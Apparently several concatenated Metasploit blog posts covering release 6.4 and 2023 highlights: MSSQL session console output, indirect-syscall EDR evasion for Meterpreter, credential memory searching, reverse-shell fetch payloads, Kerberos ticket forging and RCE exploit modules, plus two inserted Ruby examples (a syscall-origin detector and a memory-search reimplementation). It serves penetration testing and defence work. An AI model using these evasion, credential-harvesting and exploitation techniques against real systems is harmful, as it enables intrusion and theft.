[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Which you can interact with using sessions -i <session id> or sessions -i -1 to interact with the most recently opened session:

msf6 auxiliary(scanner/mssql/mssql_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                      Connection
  --  ----  ----   -----------                      ----------
  1         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:60963 -> 192.168.2.242:1433 (192.168.2.242)

msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
[*] Starting interaction with 1…
mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
Response
========
    #  NULL
    -  ----
    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
       Oct 8 2022 05:58:25
       Copyright (C) 2022 Microsoft Corporation
       Developer Edition (64-bit) on Windows Server 2022 Standard 10.0 <X64> (Build 20348: ) (Hypervisor)

The query_interactive command will start an interactive prompt for running multiple multi-line queries:

mssql @ 192.168.2.242:1433 (master) > query_interactive
[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
SQL >> select *
SQL *> from information_schema.tables
SQL *> where table_type = 'BASE TABLE';
[*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE';
Response
========
    #  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME             TABLE_TYPE
    -  -------------  ------------  ----------             ----------
    0  master         dbo           spt_fallback_db        BASE TABLE
    1  master         dbo           spt_fallback_dev       BASE TABLE
    2  master         dbo           spt_fallback_usg       BASE TABLE
    4  master         dbo           Users                  BASE TABLE
    5  master         dbo           spt_monitor            BASE TABLE
    6  master         dbo           MSreplication_options  BASE TABLE
SQL >>

Similar to SMB sessions, the new SQL sessions can be used with multiple auxiliary modules; the modules that support a given session type can be searched for:

msf6 > search session_type:smb session_type:postgres session_type:mssql session_type:mysql

Indirect Syscalls Support for Windows Meterpreter

Indirect system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do this is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Syscalls are a way to run system routines directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with indirect syscalls to the corresponding native APIs. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is finding the correct syscall number, since it is not the same across Windows versions. Also, EDRs usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in sequential order, starting from 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists of selecting the system call functions (Zw…) from the ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of a given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another technique we incorporated is to ensure the call to the syscall instruction is made through ntdll.dll. This behavior is sometimes referred to as making an "indirect syscall". EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation takes care of parsing ntdll.dll and obtaining the correct trampoline address that is used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using indirect syscalls. The long-term goal is to make indirect syscalls a standard for any future Windows-based development (payload, exploit, etc.). Users do not need to make any changes in order to run Meterpreter with these new changes.
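The monitoring the paragraphs above refer to can be illustrated from the defender's side. The following is an added example, not Meterpreter or Metasploit code: it classifies a system call by where in the process it was issued, using a constructed module map and constructed user-mode call stacks (all addresses are made up). It applies the check the text describes, whether the syscall instruction ran inside ntdll.dll, and then the follow-up check a practitioner would want, whether every frame above the ntdll stub is backed by a loaded image, since an indirect syscall passes the first check by design.

```ruby
# Added example (not Meterpreter or Metasploit code): classify a system call
# by the origin of its user-mode call stack. Module ranges and stacks below
# are constructed for the example.

# Constructed module map for one process. On a real system these ranges come
# from the loaded-module list and each image's section headers.
MODULES = [
  { name: 'ntdll.dll',    base: 0x7FF8_1230_0000, size: 0x1F_0000, text: (0x1000...0x12_0000) },
  { name: 'kernel32.dll', base: 0x7FF8_1100_0000, size: 0x0C_0000, text: (0x1000...0x09_0000) },
].freeze

# Return the module whose mapped range contains addr, or nil if the address
# is not backed by any loaded image (heap, stack or a private RWX region).
def module_for(addr, modules = MODULES)
  modules.find { |m| addr >= m[:base] && addr < m[:base] + m[:size] }
end

# True when addr lies in the module's .text section, the only place a
# legitimate syscall stub lives in ntdll.
def in_text?(addr, mod)
  mod[:text].cover?(addr - mod[:base])
end

# Classify one system call from its user-mode call stack, innermost frame
# first (stack[0] is the return address of the syscall instruction).
#   :direct_syscall  - the syscall instruction itself ran outside ntdll's .text
#   :unbacked_caller - it ran inside ntdll (an "indirect syscall"), but a
#                      frame above the stub is not backed by any loaded image
#   :benign          - every frame is inside a loaded module's .text
def classify_syscall_stack(stack, modules = MODULES)
  top = module_for(stack.first, modules)
  unless top && top[:name].casecmp?('ntdll.dll') && in_text?(stack.first, top)
    return :direct_syscall
  end
  stack.drop(1).each do |frame|
    mod = module_for(frame, modules)
    return :unbacked_caller unless mod && in_text?(frame, mod)
  end
  :benign
end

# Constructed call stacks (innermost frame first).
SAMPLE_STACKS = {
  # ordinary allocation: ntdll stub called from kernel32 code
  normal:   [0x7FF8_1235_1234, 0x7FF8_1101_5678],
  # syscall instruction executed straight from a private heap region
  direct:   [0x0000_000A_0006_0DF0],
  # stub inside ntdll, but its caller sits in an unbacked region
  indirect: [0x7FF8_1235_1234, 0x0000_000A_0006_0DF0],
}.freeze

# Verdict for each constructed sample, keyed by sample name.
def classify_samples
  SAMPLE_STACKS.transform_values { |stack| classify_syscall_stack(stack) }
end

if __FILE__ == $PROGRAM_NAME
  classify_samples.each { |name, verdict| puts "#{name}: #{verdict}" }
end
```

The `:indirect` sample is the case the text describes: the return address check alone is satisfied because the stub lives in ntdll.dll, so a detection that stops there sees nothing, while the frame above the stub gives it away. The module map here is a stand-in for the process's real loaded-module list.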

Discoverability Improvements

The definition of “a module” can be a nebulous thing. In recent years, some modules have begun to include multiple CVEs in a single exploit as part of a chain (e.g., Proxy(Not)Shell), while other CVEs affect multiple products and warrant multiple modules (e.g., Log4Shell). Furthermore, modules that aren’t exploiting a particular vulnerability often have different actions they can take, like forging different types of Kerberos tickets or running different LDAP queries for enumeration. As Metasploit development moves quickly, with new content being released each week, it can be difficult for users to find what they’re looking for.

Metasploit 6.4 has made some improvements to make discoverability easier for users. One of the largest changes is the new Hierarchical Search feature. This will cause Metasploit’s internal search capabilities to match additional fields within modules, including the actions, targets and AKA aliases. As an example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden because it is an action of the module:

msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket
   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket
   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket
   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket
   5    \_ AKA: Ticketer                                   .                .       .      .
   6    \_ AKA: Klist                                      .                .       .      .
   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >

Windows Meterpreter Memory Searching

Metasploit 6.4 incorporates a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. This can be used to search for and find potentially sensitive data in memory near the needles, similar to Linux's MimiPenguin tool. This can be executed against any process with the same or lower privilege level as the Meterpreter session.

This new API is currently in use by the post/multi/gather/memory_search module, where it can be used to search for plaintext credentials - for instance in some configurations of OpenSSH:

msf6 post(multi/gather/memory_search) > run session=1 regex="publickey,password.*" process_names_glob="ssh*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        ssh.exe (pid: 2972)

[*] Memory Matches for ssh.exe (pid: 2972)
======================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
                                   ...........S......................"

[*] Post module execution completed
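To make the output above concrete, here is an added example, not the post/multi/gather/memory_search module's code, of the search it performs: a regular expression run over each readable region of the selected processes, with every hit reported as an absolute address, match length, rendered match bytes and the region it was found in, and processes chosen by a shell-style name glob as the process_names_glob option does. The processes, regions and bytes are constructed for the example.

```ruby
# Added example (not the memory_search module's code): regex search over
# per-process memory regions. All processes, regions and bytes below are
# constructed for the example.

# Render matched bytes the way the console output does: printable ASCII
# as-is, everything else as a dot.
def render_bytes(bytes)
  bytes.each_byte.map { |b| (0x20..0x7E).cover?(b) ? b.chr : '.' }.join
end

# Search every region of one process. Each region is { base:, data: } where
# data holds the bytes read from that region. Returns one hash per hit.
def search_regions(regions, pattern)
  re = Regexp.new(pattern) # ASCII pattern, so it matches binary strings too
  hits = []
  regions.each do |region|
    data = region[:data].b
    pos = 0
    while pos <= data.bytesize && (m = re.match(data, pos))
      hits << {
        address: region[:base] + m.begin(0),
        length: m[0].bytesize,
        buffer: render_bytes(m[0]),
        region_base: region[:base],
        region_size: data.bytesize,
      }
      # advance past the match; step one byte on an empty match to avoid looping
      pos = m.end(0) + (m[0].empty? ? 1 : 0)
    end
  end
  hits
end

# Search only processes whose name matches a shell-style glob.
def search_processes(processes, pattern, glob)
  processes.select { |p| File.fnmatch?(glob, p[:name], File::FNM_CASEFOLD) }
           .map { |p| { name: p[:name], pid: p[:pid], hits: search_regions(p[:regions], pattern) } }
end

# Constructed snapshots: an ssh.exe whose region holds the credential strings
# at offset 0x60DF0, and an unrelated process the glob must skip.
NUL = "\x00".b
SSH_REGION = (NUL * 0x60DF0) + 'publickey,password'.b + (NUL * 6) + '3'.b + (NUL * 7) +
             'myverysecretpassword'.b + (NUL * 4)
SAMPLE_PROCESSES = [
  { name: 'ssh.exe',     pid: 2972, regions: [{ base: 0x0000_000A_0000_0000, data: SSH_REGION }] },
  { name: 'notepad.exe', pid: 4100, regions: [{ base: 0x0000_0200_0000_0000, data: 'publickey,password'.b }] },
].freeze

if __FILE__ == $PROGRAM_NAME
  search_processes(SAMPLE_PROCESSES, 'publickey,password.*', 'ssh*').each do |proc|
    puts "[*] Memory Matches for #{proc[:name]} (pid: #{proc[:pid]})"
    proc[:hits].each do |h|
      printf("0x%016X  %-4d  %s  0x%016X  0x%016X\n", h[:address], h[:length], h[:buffer].inspect,
             h[:region_base], h[:region_size])
    end
  end
end
```

Because `.` does not cross a newline byte, a greedy `.*` stops at the first 0x0A in the region rather than running to its end; with a needle like the one above that is usually what you want, since the surrounding bytes are what carry the interesting data.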

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Jack Heysel, Jacquie Harris, Jeffrey Martin, Navya Harika Karaka, Simon Janusz, Zach Goldman, Egor Kalinichev, and Spencer McIntyre.

New Fetch Payload

Metasploit Weekly Wrap-Up 02/16/2024

It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32, which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf stephen_fewer@harmonysecurity.com
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

  • cmd/windows/smb/x64/custom/bind_ipv6_tcp
  • cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/custom/bind_named_pipe
  • cmd/windows/smb/x64/custom/bind_tcp
  • cmd/windows/smb/x64/custom/bind_tcp_rc4
  • cmd/windows/smb/x64/custom/bind_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_http
  • cmd/windows/smb/x64/custom/reverse_https
  • cmd/windows/smb/x64/custom/reverse_named_pipe
  • cmd/windows/smb/x64/custom/reverse_tcp
  • cmd/windows/smb/x64/custom/reverse_tcp_rc4
  • cmd/windows/smb/x64/custom/reverse_tcp_uuid
  • cmd/windows/smb/x64/custom/reverse_winhttp
  • cmd/windows/smb/x64/custom/reverse_winhttps
  • cmd/windows/smb/x64/encrypted_shell/reverse_tcp
  • cmd/windows/smb/x64/encrypted_shell_reverse_tcp
  • cmd/windows/smb/x64/exec
  • cmd/windows/smb/x64/loadlibrary
  • cmd/windows/smb/x64/messagebox
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/bind_named_pipe
  • cmd/windows/smb/x64/meterpreter/bind_tcp
  • cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_http
  • cmd/windows/smb/x64/meterpreter/reverse_https
  • cmd/windows/smb/x64/meterpreter/reverse_named_pipe
  • cmd/windows/smb/x64/meterpreter/reverse_tcp
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
  • cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
  • cmd/windows/smb/x64/meterpreter/reverse_winhttp
  • cmd/windows/smb/x64/meterpreter/reverse_winhttps
  • cmd/windows/smb/x64/meterpreter_bind_named_pipe
  • cmd/windows/smb/x64/meterpreter_bind_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_http
  • cmd/windows/smb/x64/meterpreter_reverse_https
  • cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
  • cmd/windows/smb/x64/meterpreter_reverse_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/peinject/bind_named_pipe
  • cmd/windows/smb/x64/peinject/bind_tcp
  • cmd/windows/smb/x64/peinject/bind_tcp_rc4
  • cmd/windows/smb/x64/peinject/bind_tcp_uuid
  • cmd/windows/smb/x64/peinject/reverse_named_pipe
  • cmd/windows/smb/x64/peinject/reverse_tcp
  • cmd/windows/smb/x64/peinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/peinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/pingback_reverse_tcp
  • cmd/windows/smb/x64/powershell_bind_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp
  • cmd/windows/smb/x64/powershell_reverse_tcp_ssl
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp
  • cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/shell/bind_named_pipe
  • cmd/windows/smb/x64/shell/bind_tcp
  • cmd/windows/smb/x64/shell/bind_tcp_rc4
  • cmd/windows/smb/x64/shell/bind_tcp_uuid
  • cmd/windows/smb/x64/shell/reverse_tcp
  • cmd/windows/smb/x64/shell/reverse_tcp_rc4
  • cmd/windows/smb/x64/shell/reverse_tcp_uuid
  • cmd/windows/smb/x64/shell_bind_tcp
  • cmd/windows/smb/x64/shell_reverse_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
  • cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
  • cmd/windows/smb/x64/vncinject/bind_named_pipe
  • cmd/windows/smb/x64/vncinject/bind_tcp
  • cmd/windows/smb/x64/vncinject/bind_tcp_rc4
  • cmd/windows/smb/x64/vncinject/bind_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_http
  • cmd/windows/smb/x64/vncinject/reverse_https
  • cmd/windows/smb/x64/vncinject/reverse_tcp
  • cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
  • cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
  • cmd/windows/smb/x64/vncinject/reverse_winhttp
  • cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

  • #18706 from sjanusz-r7 - Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
  • #18747 from zgoldman-r7 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
  • #18759 from cgranleese-r7 - Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
  • #18763 from zgoldman-r7 - Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
  • #18806 from cgranleese-r7 - Improves unknown command handling by suggesting similar valid commands.
  • #18809 from zeroSteiner - Makes multiple improvements to the dns command - a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
  • #18825 from cgranleese-r7 - Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

  • #18616 from adfoster-r7 - This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
  • #18774 from adfoster-r7 - Updates the following modules to now work with newer versions of sqlcmd:
    post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
  • #18786 from lihe07 - This fixes an option name collision between the exploit/linux/local/service_persistence module and the cmd/unix/reverse_netcat payload when that payload is selected. The option to set the writable path is now BACKDOOR_PATH.
  • #18795 from cgranleese-r7 - Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
  • #18798 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module's check method that was causing version comparisons to fail.
  • #18799 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_17136 module's check method that was causing version comparisons to fail.
  • #18800 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2021_40449 module's check method that was causing version comparisons to fail.
  • #18801 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module's check method that was causing version comparisons to fail.
  • #18812 from adfoster-r7 - Reverts the auxiliary/scanner/mssql/mssql_login module's TDSENCRYPTION default value to false.
  • #18813 from adfoster-r7 - Fixes a crash when running the help services or help hosts commands.
  • #18823 from cdelafuente-r7 - Fix module metadata platform list comparison.
  • #18826 from dwelch-r7 - Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
  • #18828 from dwelch-r7 - Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro.

Metasploit 2023 Wrap-Up

As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added as well for a variety of tasks such as requesting tickets from the Key Distribution Center (aka the KDC which is almost always the Active Directory Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more popular, it often limits the type of payloads that can easily be added to an exploit since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

  • The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
  • The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

  • Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
  • Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
  • JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
  • Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
  • Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
  • usiegl00 and Ishaanahuja7 both contributed enhancements to add support for OSX AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

  • CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-grey brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.

  • CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.

  • CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.

  • CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.

  • CVE-2023-22952 (Exploit) - This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.

  • CVE-2023-20887 (Exploit) - This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however, this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.

  • CVE-2023-27350 (Exploit) - Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.

  • Post Module - Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing along with it a large amount of railgun enhancements this module allows for Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work along with this module helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit's Kerberos authentication capabilities yet, put it at the top of your todo list for 2024!

  • CVE-2023-28252 (Exploit) - The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module that uses the Reflective DLL template in order to drop a low level PoC which returns a session running in the context of NT AUTHORITY\SYSTEM.

  • CVE-2023-40044 (Exploit) - Another exploit that made big waves this year was the WS_FTP server running the Ad Hoc Transfer module .NET deserialization vulnerability. The module and the initial research behind how the vulnerability actually works was brought to us by Metasploit’s very own, veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is: select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

  • h00die
  • bcoles
  • smashery
  • h00die-gr3y
  • jmartin-tech
  • ErikWynter
  • EgeBalci
  • ismaildawoodjee (new in 2023)
  • wvu
  • jvoisin
  • sempervictus
  • rorymckinley (new in 2023)
  • rad10
  • manishkumarr1017 (new in 2023)
  • Ryuuuuu (new in 2023)
  • prabhatjoshi321 (new in 2023)
  • Chocapikk (new in 2023)
  • Jemmy1228 (new in 2023)
  • AleksaZatezalo (new in 2023)
  • emirpolatt (new in 2023)
  • heyder
  • steve-embling
  • dm-ct (new in 2023)
  • ide0x90
  • archcloudlabs
  • samsepi0x0 (new in 2023)
  • Lorenyx (new in 2023)
  • MikeAnast (new in 2023)
  • loredous (new in 2023)
  • bradyjackson (new in 2023)
  • nfsec
